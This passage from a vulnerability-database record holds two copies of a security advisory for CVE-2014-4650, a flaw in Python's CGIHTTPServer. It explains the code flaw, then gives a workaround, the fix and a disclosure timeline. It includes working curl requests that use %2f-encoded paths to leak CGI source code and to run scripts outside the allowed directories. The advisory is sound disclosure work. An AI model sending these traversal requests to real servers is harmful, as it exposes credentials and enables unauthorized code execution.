outputs the file's contents raw. As translate_path() URL decodes \nthe path, this then succeeds and discloses the CGI script's file \ncontents: \n \n$ curl http://localhost:8000/cgi-bin%2ftest.py \n#!/usr/bin/env python2 \nimport json \nimport sys \n \ndb_credentials = \"SECRET\" \nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\") \nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"})) \n \nSimilarly, the CGIHTTPRequestHandler can be tricked into executing CGI \nscripts that would normally not be executable. The class normally only \nallows executing CGI scripts that are direct children of one of the \ndirectories listed in cgi_directories. Furthermore, only direct \nsubdirectories of the document root (the current working directory) can \nbe valid CGI directories. \n \nThis can be seen in the following example. Even though the sample server \nshown above includes \"/cgi-bin/subdir\" as part of the request handler's \ncgi_directories, a CGI script named test.py in that directory is not \nexecuted: \n \n$ curl http://localhost:8000/cgi-bin/subdir/test.py \n[...] \n<p>Error code 403. \n<p>Message: CGI script is not a plain file ('/cgi-bin/subdir'). \n[...] \n \nHere, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and \nreturned True. Next, run_cgi() further dissected these paths to perform \nsome sanity checks, thereby mistakenly assuming subdir to be the \nexecutable script's filename and test.py to be path info. As subdir is \nnot an executable file, run_cgi() returns an error message. However, if \nthe forward slash between subdir and test.py is replaced with %2f, \ninvoking the script succeeds: \n \n$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py \n{\"text\": \"This is a Test\"} \n \nThis is because neither is_cgi() nor run_cgi() URL decode the path \nduring processing until run_cgi() tries to determine whether the target \nscript is an executable file. More specifically, as subdir%2ftest.py \ndoes not contain a forward slash, it is not split into the script name \nsubdir and path info test.py, as in the previous example. \n \nSimilarly, using URL encoded forward slashes, executables outside of a \nCGI directory can be executed: \n \n$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py \n{\"text\": \"This is a Test\"} \n \n \nWorkaround \n========== \n \nSubclass CGIHTTPRequestHandler and override the is_cgi() method with a \nvariant that first URL decodes the supplied path, for example: \n \nclass FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler): \ndef is_cgi(self): \nself.path = urllib.unquote(self.path) \nreturn CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self) \n \n \nFix \n=== \n \nUpdate to the latest Python version from the Mercurial repository at \nhttp://hg.python.org/cpython/ \n \n \nSecurity Risk \n============= \n \nThe vulnerability can be used to gain access to the contents of CGI \nbinaries or the source code of CGI scripts. This may reveal sensitve \ninformation, for example access credentials. This can greatly help \nattackers in mounting further attacks and is therefore considered to \npose a high risk. Furthermore attackers may be able to execute code that \nwas not intended to be executed. However, this is limited to files \nstored in the server's working directory or in its subdirectories. \n \nThe CGIHTTPServer code does contain this warning: \n\"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL\" \nEven when used on a local computer this may allow other local users to \nexecute code in the context of another user. \n \n \nTimeline \n======== \n \n2014-04-07 Vulnerability identified \n2014-06-11 Customer approved disclosure to vendor \n2014-06-11 Vendor notified \n2014-06-15 Vendor disclosed vulnerability in their public bug tracker \nand addressed it in public source code repository \n2014-06-23 CVE number requested \n2014-06-25 CVE number assigned \n2014-06-26 Advisory released \n \n \nReferences \n========== \n \nhttp://bugs.python.org/issue21766 \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests, short pentests, \nperformed by a team of specialised IT-security experts. Hereby, security \nweaknesses in company networks or products are uncovered and can be \nfixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at \nhttps://www.redteam-pentesting.de. \n \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/127241/rt-sa-2014-008.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:44", "description": "\nPython CGIHTTPServer - Encoded Directory Traversal", "edition": 1, "published": "2014-06-27T00:00:00", "title": "Python CGIHTTPServer - Encoded Directory Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4650"], "modified": "2014-06-27T00:00:00", "id": "EXPLOITPACK:35A921A81EE6FB28E829D4305BB3A08D", "href": "", "sourceData": "Advisory: Python CGIHTTPServer File Disclosure and Potential Code\n Execution\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded\npath separators in URLs. This may enable attackers to disclose a CGI\nscript's source code or execute arbitrary CGI scripts in the server's\ndocument root.\n\nDetails\n=======\n\nProduct: Python CGIHTTPServer\nAffected Versions:\n 2.7 - 2.7.7,\n 3.2 - 3.2.4,\n 3.3 - 3.3.2,\n 3.4 - 3.4.1,\n 3.5 pre-release\nFixed Versions:\n 2.7 rev b4bab0788768,\n 3.2 rev e47422855841,\n 3.3 rev 5676797f3a3e,\n 3.4 rev 847e288d6e93,\n 3.5 rev f8b3bb5eb190\nVulnerability Type: File Disclosure, Directory Traversal, Code Execution\nSecurity Risk: high\nVendor URL: https://docs.python.org/2/library/cgihttpserver.html\nVendor Status: fixed version released\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-008\nAdvisory Status: published\nCVE: CVE-2014-4650\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650\n\n\nIntroduction\n============\n\nThe CGIHTTPServer module defines a request-handler class, interface\ncompatible with BaseHTTPServer. BaseHTTPRequestHandler and inherits\nbehavior from SimpleHTTPServer. SimpleHTTPRequestHandler but can also\nrun CGI scripts.\n\n(from the Python documentation)\n\n\nMore Details\n============\n\nThe CGIHTTPServer module can be used to set up a simple HTTP server with\nCGI scripts. A sample server script in Python may look like the\nfollowing:\n\n------------------------------------------------------------------------\n#!/usr/bin/env python2\n\nimport CGIHTTPServer\nimport BaseHTTPServer\n\nif __name__ == \"__main__\":\n server = BaseHTTPServer.HTTPServer\n handler = CGIHTTPServer.CGIHTTPRequestHandler\n server_address = (\"\", 8000)\n # Note that only /cgi-bin will work:\n handler.cgi_directories = [\"/cgi-bin\", \"/cgi-bin/subdir\"]\n httpd = server(server_address, handler)\n httpd.serve_forever()\n------------------------------------------------------------------------\n\nThis server should execute any scripts located in the subdirectory\n\"cgi-bin\". A sample CGI script can be placed in that directory, for\nexample a script like the following:\n\n------------------------------------------------------------------------\n#!/usr/bin/env python2\nimport json\nimport sys\n\ndb_credentials = \"SECRET\"\nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\")\nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"}))\n------------------------------------------------------------------------\n\nThe Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler\nclass which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler:\n\nclass SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\n[...]\n def do_GET(self):\n \"\"\"Serve a GET request.\"\"\"\n f = self.send_head()\n if f:\n try:\n self.copyfile(f, self.wfile)\n finally:\n f.close()\n\n def do_HEAD(self):\n \"\"\"Serve a HEAD request.\"\"\"\n f = self.send_head()\n if f:\n f.close()\n\n def translate_path(self, path):\n [...]\n path = posixpath.normpath(urllib.unquote(path))\n words = path.split('/')\n words = filter(None, words)\n path = os.getcwd()\n [...]\n\nThe CGIHTTPRequestHandler class inherits, among others, the methods\ndo_GET() and do_HEAD() for handling HTTP GET and HTTP HEAD requests. The\nclass overrides send_head() and implements several new methods, such as\ndo_POST(), is_cgi() and run_cgi():\n\nclass CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n[...]\n def do_POST(self):\n [...]\n if self.is_cgi():\n self.run_cgi()\n else:\n self.send_error(501, \"Can only POST to CGI scripts\")\n\n def send_head(self):\n \"\"\"Version of send_head that support CGI scripts\"\"\"\n if self.is_cgi():\n return self.run_cgi()\n else:\n return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)\n\n def is_cgi(self):\n [...]\n collapsed_path = _url_collapse_path(self.path)\n dir_sep = collapsed_path.find('/', 1)\n head, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:]\n if head in self.cgi_directories:\n self.cgi_info = head, tail\n return True\n return False\n[...]\n def run_cgi(self):\n \"\"\"Execute a CGI script.\"\"\"\n dir, rest = self.cgi_info\n\n [...]\n\n # dissect the part after the directory name into a script name &\n # a possible additional path, to be stored in PATH_INFO.\n i = rest.find('/')\n if i >= 0:\n script, rest = rest[:i], rest[i:]\n else:\n script, rest = rest, ''\n\n scriptname = dir + '/' + script\n scriptfile = self.translate_path(scriptname)\n if not os.path.exists(scriptfile):\n self.send_error(404, \"No such CGI script (%r)\" % scriptname)\n return\n if not os.path.isfile(scriptfile):\n self.send_error(403, \"CGI script is not a plain file (%r)\" %\n scriptname)\n return\n [...]\n[...]\n\nFor HTTP GET requests, do_GET() first invokes send_head(). That method\ncalls is_cgi() to determine whether the requested path is to be executed\nas a CGI script. The is_cgi() method uses _url_collapse_path() to\nnormalize the path, i.e. remove extraneous slashes (/),current directory\n(.), or parent directory (..) elements, taking care not to permit\ndirectory traversal below the document root. The is_cgi() function\nreturns True when the first path element is contained in the\ncgi_directories list. As _url_collaps_path() and is_cgi() never URL\ndecode the path, replacing the forward slash after the CGI directory in\nthe URL to a CGI script with the URL encoded variant %2f leads to\nis_cgi() returning False. This will make CGIHTTPRequestHandler's\nsend_head() then invoke its parent's send_head() method which translates\nthe URL path to a file system path using the translate_path() method and\nthen outputs the file's contents raw. As translate_path() URL decodes\nthe path, this then succeeds and discloses the CGI script's file\ncontents:\n\n$ curl http://localhost:8000/cgi-bin%2ftest.py\n#!/usr/bin/env python2\nimport json\nimport sys\n\ndb_credentials = \"SECRET\"\nsys.stdout.write(\"Content-type: text/json\\r\\n\\r\\n\")\nsys.stdout.write(json.dumps({\"text\": \"This is a Test\"}))\n\nSimilarly, the CGIHTTPRequestHandler can be tricked into executing CGI\nscripts that would normally not be executable. The class normally only\nallows executing CGI scripts that are direct children of one of the\ndirectories listed in cgi_directories. Furthermore, only direct\nsubdirectories of the document root (the current working directory) can\nbe valid CGI directories.\n\nThis can be seen in the following example. Even though the sample server\nshown above includes \"/cgi-bin/subdir\" as part of the request handler's\ncgi_directories, a CGI script named test.py in that directory is not\nexecuted:\n\n$ curl http://localhost:8000/cgi-bin/subdir/test.py\n[...]\n<p>Error code 403.\n<p>Message: CGI script is not a plain file ('/cgi-bin/subdir').\n[...]\n\nHere, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and\nreturned True. Next, run_cgi() further dissected these paths to perform\nsome sanity checks, thereby mistakenly assuming subdir to be the\nexecutable script's filename and test.py to be path info. As subdir is\nnot an executable file, run_cgi() returns an error message. However, if\nthe forward slash between subdir and test.py is replaced with %2f,\ninvoking the script succeeds:\n\n$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py\n{\"text\": \"This is a Test\"}\n\nThis is because neither is_cgi() nor run_cgi() URL decode the path\nduring processing until run_cgi() tries to determine whether the target\nscript is an executable file. More specifically, as subdir%2ftest.py\ndoes not contain a forward slash, it is not split into the script name\nsubdir and path info test.py, as in the previous example.\n\nSimilarly, using URL encoded forward slashes, executables outside of a\nCGI directory can be executed:\n\n$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py\n{\"text\": \"This is a Test\"}\n\n\nWorkaround\n==========\n\nSubclass CGIHTTPRequestHandler and override the is_cgi() method with a\nvariant that first URL decodes the supplied path, for example:\n\nclass FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):\n def is_cgi(self):\n self.path = urllib.unquote(self.path)\n return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)\n\n\nFix\n===\n\nUpdate to the latest Python version from the Mercurial repository at\nhttp://hg.python.org/cpython/\n\n\nSecurity Risk\n=============\n\nThe vulnerability can be used to gain access to the contents of CGI\nbinaries or the source code of CGI scripts. This may reveal sensitve\ninformation, for example access credentials. This can greatly help\nattackers in mounting further attacks and is therefore considered to\npose a high risk. Furthermore attackers may be able to execute code that\nwas not intended to be executed. However, this is limited to files\nstored in the server's working directory or in its subdirectories.\n\nThe CGIHTTPServer code does contain this warning:\n\"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL\"\nEven when used on a local computer this may allow other local users to\nexecute code in the context of another user.\n\n\nTimeline\n========\n\n2014-04-07 Vulnerability identified\n2014-06-11 Customer approved disclosure to vendor\n2014-06-11 Vendor notified\n2014-06-15 Vendor disclosed vulnerability in their public bug tracker\n and addressed it in public source code repository\n2014-06-23 CVE number requested\n2014-06-25 CVE number assigned\n2014-06-26 Advisory released\n\n\nReferences\n==========\n\nhttp://bugs.python.org/issue21766\n\n\nRedTeam Pentesting GmbH\n=======================\n\nRedTeam Pentesting offers individual penetration tests, short pentests,\nperformed by a team of specialised IT-security experts. Hereby, security\nweaknesses in company networks or products are uncovered and can be\nfixed immediately.\n\nAs there are only few experts in this field, RedTeam Pentesting wants to\nshare its knowledge and enhance the public knowledge with research in\nsecurity related areas. The results are made available as public\nsecurity advisories.\n\nMore information about RedTeam Pentesting can be found at\nhttps://www.redteam-pentesting.de.\n\n\n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0\nDennewartstr. 25-27 Fax : +49 241 510081-99\n52068 Aachen https://www.redteam-pentesting.de\nGermany Registergericht: Aachen HRB 14004\nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
